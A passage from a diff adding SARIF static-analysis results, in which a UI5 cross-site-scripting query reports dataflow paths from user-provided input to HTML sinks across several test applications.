: 26, + "startColumn" : 17, + "endColumn" : 42 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 27, + "startColumn" : 36, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 26, + "startColumn" : 25, + "endColumn" : 42 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "353ad97f4bff4eae:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 363 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uriBaseId" : "%SRCROOT%", + "index" : 360 + }, + "region" : { + "startLine" : 5, + "startColumn" : 15, + "endColumn" : 33 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "353ad97f4bff4eae:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 389 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 388 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "353ad97f4bff4eae:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 399 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 396 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 21, + "startColumn" : 22, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "5d5122f6c75b5d01:1", + "primaryLocationStartColumnFingerprint" : "9" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 18, + "startColumn" : 20, + "endColumn" : 30 + } + }, + "message" : { + "text" : "/input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 371 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 21, + "startColumn" : 22, + "endColumn" : 32 + } + }, + "message" : { + "text" : "/input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 18, + "startColumn" : 20, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 13, + "startColumn" : 15, + "endColumn" : 25 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "c18df3aa119b40dc:1", + "primaryLocationStartColumnFingerprint" : "11" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 9, + "startColumn" : 13, + "endColumn" : 23 + } + }, + "message" : { + "text" : "\"value\": \"{/input}\"" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 379 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 13, + "startColumn" : 15, + "endColumn" : 25 + } + }, + "message" : { + "text" : "\"content\": \"{/input}\"" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 9, + "startColumn" : 13, + "endColumn" : 23 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 50 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "74b35e217af6aa05:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 50 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 9, + "startColumn" : 5, + "endColumn" : 40 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "9caa0f252fbe2993:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 31, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 9, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 10, + "startColumn" : 44, + "endColumn" : 49 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 32, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "output1: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 9, + "startColumn" : 5, + "endColumn" : 40 + } + }, + "message" : { + "text" : "content={/output1}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 17, + "startColumn" : 5, + "endColumn" : 40 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "2963bbd458e69924:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 18, + "startColumn" : 31, + "endColumn" : 60 + } + }, + "message" : { + "text" : "oEvent. ... Value()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 18, + "startColumn" : 17, + "endColumn" : 60 + } + }, + "message" : { + "text" : "sInputValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 19, + "startColumn" : 44, + "endColumn" : 55 + } + }, + "message" : { + "text" : "sInputValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 34, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "output3: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 17, + "startColumn" : 5, + "endColumn" : 40 + } + }, + "message" : { + "text" : "content={/output3}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 18, + "startColumn" : 31, + "endColumn" : 60 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "97b29ed20ac04ff0:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 319 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 38 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "1406455ac263a2d9:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 12, + "startColumn" : 26, + "endColumn" : 46 + } + }, + "message" : { + "text" : "new JSONModel(oData)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/output}" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 15, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 15, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 16, + "startColumn" : 43, + "endColumn" : 48 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 29 + } + }, + "message" : { + "text" : "output: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/output}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + 